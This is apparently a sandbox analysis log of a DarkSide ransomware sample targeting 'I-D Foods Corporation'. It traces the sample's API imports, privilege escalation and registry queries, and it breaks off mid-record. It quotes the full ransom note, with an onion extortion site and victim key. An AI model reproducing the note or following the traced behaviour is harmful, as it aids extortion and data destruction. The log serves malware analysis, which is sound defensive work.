# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 15.01.2021 10:43:36.199 Process: id = "1" image_name = "idfoodsf.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\idfoodsf.exe" page_root = "0x4b67d000" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\idfoodsf.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x9fc [0035.316] LoadLibraryA (lpLibFileName="ntdll") returned 0x77c40000 [0035.317] GetProcAddress (hModule=0x77c40000, lpProcName="_wcsicmp") returned 0x77c79337 [0035.317] GetProcAddress (hModule=0x77c40000, lpProcName="_wcsnicmp") returned 0x77c6f63b [0035.317] GetProcAddress (hModule=0x77c40000, lpProcName="wcscpy") returned 0x77d156cd [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="wcscat") returned 0x77d1569a [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="wcsstr") returned 0x77c70c87 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="wcsrchr") returned 0x77c77ee9 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="wcslen") returned 0x77d156f1 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="_wcslwr") returned 0x77d14b6b [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="swprintf") returned 0x77d1550d [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="LdrEnumerateLoadedModules") returned 0x77c7bf1f [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="RtlRandomEx") returned 0x77c801e3 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="RtlComputeCrc32") returned 0x77cfffc1 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="_allshr") returned 0x77c78990 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="_alldiv") returned 0x77cb8d00 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="NtQuerySystemInformation") returned 0x77c5fda0 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryInformationFile") returned 0x77c5fa00 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryInformationProcess") returned 0x77c5fac8 [0035.318] GetProcAddress (hModule=0x77c40000, lpProcName="strlen") returned 0x77cbc4e0 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="sprintf") returned 0x77d153c3 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlGetVersion") returned 0x77c7873a [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlWow64EnableFsRedirectionEx") returned 0x77ca431a [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="NtAllocateVirtualMemory") returned 0x77c5fab0 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="NtProtectVirtualMemory") returned 0x77c60028 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationProcess") returned 0x77c5fb18 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitializeCriticalSection") returned 0x77c72c42 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlEnterCriticalSection") returned 0x77c622b0 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlLeaveCriticalSection") returned 0x77c62270 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDeleteCriticalSection") returned 0x77c745f5 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlAllocateHeap") returned 0x77c6e026 [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlReAllocateHeap") returned 0x77c81f6e [0035.319] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeHeap") returned 0x77c6df85 [0035.319] LoadLibraryA (lpLibFileName="kernel32") returned 0x76d30000 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="OpenMutexW") returned 0x76d45151 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexW") returned 0x76d4424c [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLangID") returned 0x76d5d5fd [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDefaultUILanguage") returned 0x76d62b22 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0035.320] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameW") returned 0x76d4d2f9 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableW") returned 0x76d41b48 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="CreateIoCompletionPort") returned 0x76d5eef2 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetQueuedCompletionStatus") returned 0x76d5d3c3 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="PostQueuedCompletionStatus") returned 0x76d5ef29 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0035.321] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76d5d668 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadExecutionState") returned 0x76d5f747 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileExW") returned 0x76d59b2d [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeThread") returned 0x76d5d5b5 [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="RemoveDirectoryW") returned 0x76dc44cf [0035.322] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryW") returned 0x76d51260 [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0035.323] GetProcAddress (hModule=0x76d30000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x76dc3f49 [0035.323] LoadLibraryA (lpLibFileName="advapi32") returned 0x77710000 [0041.007] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0041.007] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateTokenEx") returned 0x7771ca24 [0041.007] GetProcAddress (hModule=0x77710000, lpProcName="ImpersonateLoggedOnUser") returned 0x7771c57a [0041.007] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0041.007] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0041.007] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="EnumServicesStatusExW") returned 0x7771b466 [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="GetNamedSecurityInfoW") returned 0x7771f4fd [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="SetNamedSecurityInfoW") returned 0x77719fe2 [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="SetEntriesInAclW") returned 0x77722a66 [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0041.008] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0041.009] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0041.009] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteValueW") returned 0x7771cf31 [0041.009] GetProcAddress (hModule=0x77710000, lpProcName="RegFlushKey") returned 0x7773773f [0041.009] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0041.009] GetProcAddress (hModule=0x77710000, lpProcName="RevertToSelf") returned 0x77721562 [0041.009] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0041.009] LoadLibraryA (lpLibFileName="shell32") returned 0x759d0000 [0049.511] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0049.511] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteW") returned 0x759e3c71 [0049.511] GetProcAddress (hModule=0x759d0000, lpProcName="IsUserAnAdmin") returned 0x75a244f5 [0049.511] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0049.511] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderPathW") returned 0x759f0468 [0049.511] GetProcAddress (hModule=0x759d0000, lpProcName="SHChangeNotify") returned 0x75a27965 [0049.511] LoadLibraryA (lpLibFileName="ole32") returned 0x76620000 [0053.007] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0053.007] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0053.007] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObject") returned 0x7667b68d [0053.008] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0053.008] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0053.008] GetProcAddress (hModule=0x76620000, lpProcName="CoSetProxyBlanket") returned 0x76635ea5 [0053.008] LoadLibraryA (lpLibFileName="oleaut32") returned 0x76e40000 [0053.957] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0053.957] LoadLibraryA (lpLibFileName="mpr") returned 0x75660000 [0054.445] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0054.445] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0054.445] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0054.445] LoadLibraryA (lpLibFileName="iphlpapi") returned 0x75640000 [0055.208] GetProcAddress (hModule=0x75640000, lpProcName="GetAdaptersInfo") returned 0x75649263 [0055.208] GetProcAddress (hModule=0x75640000, lpProcName="SendARP") returned 0x7564f456 [0055.208] LoadLibraryA (lpLibFileName="shlwapi") returned 0x772f0000 [0055.208] GetProcAddress (hModule=0x772f0000, lpProcName="PathIsDirectoryEmptyW") returned 0x7732cd81 [0055.209] GetProcAddress (hModule=0x772f0000, lpProcName="PathAddBackslashW") returned 0x7730c177 [0055.209] GetProcAddress (hModule=0x772f0000, lpProcName="PathIsNetworkPathW") returned 0x7730ae84 [0055.209] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0055.209] GetProcAddress (hModule=0x772f0000, lpProcName="PathIsUNCServerW") returned 0x772ffebf [0055.209] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveBackslashW") returned 0x77305c62 [0055.209] LoadLibraryA (lpLibFileName="gdi32") returned 0x770a0000 [0055.209] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFontW") returned 0x770bb600 [0055.209] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0055.209] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0055.209] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkColor") returned 0x770b52d8 [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDIBSection") returned 0x770bac46 [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="SetTextColor") returned 0x770b522d [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkMode") returned 0x770b51a2 [0055.210] GetProcAddress (hModule=0x770a0000, lpProcName="GetTextExtentPoint32W") returned 0x770bc107 [0055.210] LoadLibraryA (lpLibFileName="user32") returned 0x77130000 [0055.210] GetProcAddress (hModule=0x77130000, lpProcName="DrawTextW") returned 0x771525cf [0055.210] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0055.211] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0055.211] GetProcAddress (hModule=0x77130000, lpProcName="SystemParametersInfoW") returned 0x771490d3 [0055.211] LoadLibraryA (lpLibFileName="netapi32") returned 0x75610000 [0056.416] GetProcAddress (hModule=0x75610000, lpProcName="NetGetJoinInformation") returned 0x755d2c3f [0056.416] GetProcAddress (hModule=0x75610000, lpProcName="NetShareEnum") returned 0x755e3f33 [0056.416] LoadLibraryA (lpLibFileName="wsock32") returned 0x755c0000 [0057.109] GetProcAddress (hModule=0x755c0000, lpProcName="WSAStartup") returned 0x77233ab2 [0057.109] GetProcAddress (hModule=0x755c0000, lpProcName="WSACleanup") returned 0x77233c5f [0057.110] GetProcAddress (hModule=0x755c0000, lpProcName="gethostbyaddr") returned 0x77246c01 [0057.110] GetProcAddress (hModule=0x755c0000, lpProcName="inet_addr") returned 0x7723311b [0057.110] LoadLibraryA (lpLibFileName="wininet") returned 0x758d0000 [0061.910] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestW") returned 0x758f4a42 [0061.911] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestW") returned 0x758fba12 [0061.911] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0061.911] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectW") returned 0x758f492c [0061.911] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0061.911] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0061.911] GetProcAddress (hModule=0x758d0000, lpProcName="InternetQueryOptionW") returned 0x758e7ed7 [0061.911] GetProcAddress (hModule=0x758d0000, lpProcName="InternetSetOptionW") returned 0x758e7741 [0061.911] LoadLibraryA (lpLibFileName="wtsapi32") returned 0x755b0000 [0062.083] GetProcAddress (hModule=0x755b0000, lpProcName="WTSQueryUserToken") returned 0x755b1f81 [0062.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1a, ProcessInformation=0x32f9a0, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x32f9a0, ReturnLength=0x0) returned 0x0 [0062.083] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x2ea00) returned 0x14e320 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x204) returned 0x17cd28 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x104) returned 0x17cf38 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x1e4) returned 0x17d048 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x44) returned 0x147ab8 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x14) returned 0x144b40 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x94) returned 0x17d238 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x4c4) returned 0x17d2d8 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x444) returned 0x17d7a8 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x94) returned 0x17dbf8 [0062.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x7d4) returned 0x17dc98 [0062.086] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0062.088] RtlComputeCrc32 (PartialCrc=0xffff, Buffer=0x17dc98, Length=0x7ca) returned 0x446c0b55 [0062.089] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x14e320) returned 1 [0062.089] NtSetInformationThread (ThreadHandle=0x0, ThreadInformationClass=0x1, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0xc0000003 [0062.093] IsUserAnAdmin () returned 1 [0062.093] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x32f9a8 | out: TokenHandle=0x32f9a8*=0xb8) returned 1 [0062.093] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x3, TokenInformation=0x32f9a4, TokenInformationLength=0x4, ReturnLength=0x32f9a0 | out: TokenInformation=0x32f9a4, ReturnLength=0x32f9a0) returned 0 [0062.093] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x118) returned 0x17e478 [0062.093] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x3, TokenInformation=0x17e478, TokenInformationLength=0x118, ReturnLength=0x32f9a0 | out: TokenInformation=0x17e478, ReturnLength=0x32f9a0) returned 1 [0062.094] AdjustTokenPrivileges (in: TokenHandle=0xb8, DisableAllPrivileges=0, NewState=0x17e478*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0062.094] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17e478) returned 1 [0062.094] CloseHandle (hObject=0xb8) returned 1 [0062.094] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x12, ProcessInformation=0xcb1020, ProcessInformationLength=0x2) returned 0x0 [0062.094] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x21, ProcessInformation=0xcb1020, ProcessInformationLength=0x4) returned 0x0 [0062.094] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x32f9a8 | out: TokenHandle=0x32f9a8*=0xb8) returned 1 [0062.094] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x32f870, TokenInformationLength=0x28, ReturnLength=0x32f898 | out: TokenInformation=0x32f870, ReturnLength=0x32f898) returned 1 [0062.094] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x32f878*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x32f91c, cchName=0x32f9a0, ReferencedDomainName=0x32f89c, cchReferencedDomainName=0x32f99c, peUse=0x32f9a4 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x32f9a0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x32f99c, peUse=0x32f9a4) returned 1 [0062.105] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x1a) returned 0x14e6e0 [0062.105] _wcsicmp (_Str1="XDUWTFONO", _Str2="NT AUTHORITY") returned 10 [0062.105] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x14e6e0) returned 1 [0062.105] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x18) returned 0x17ed28 [0062.105] _wcsicmp (_Str1="XDUWTFONO", _Str2="AUTORITE NT") returned 23 [0062.105] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17ed28) returned 1 [0062.105] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x1a) returned 0x14e6e0 [0062.105] _wcsicmp (_Str1="XDUWTFONO", _Str2="NT-AUTORITÄT") returned 10 [0062.105] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x14e6e0) returned 1 [0062.105] CloseHandle (hObject=0xb8) returned 1 [0062.106] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x40) returned 0x145b80 [0062.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x101, phkResult=0x32f9a4 | out: phkResult=0x32f9a4*=0xb8) returned 0x0 [0062.106] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x18) returned 0x1513c8 [0062.106] RegQueryValueExW (in: hKey=0xb8, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x32f9a0, lpData=0x32f8dc, lpcbData=0x32f99c*=0x80 | out: lpType=0x32f9a0*=0x1, 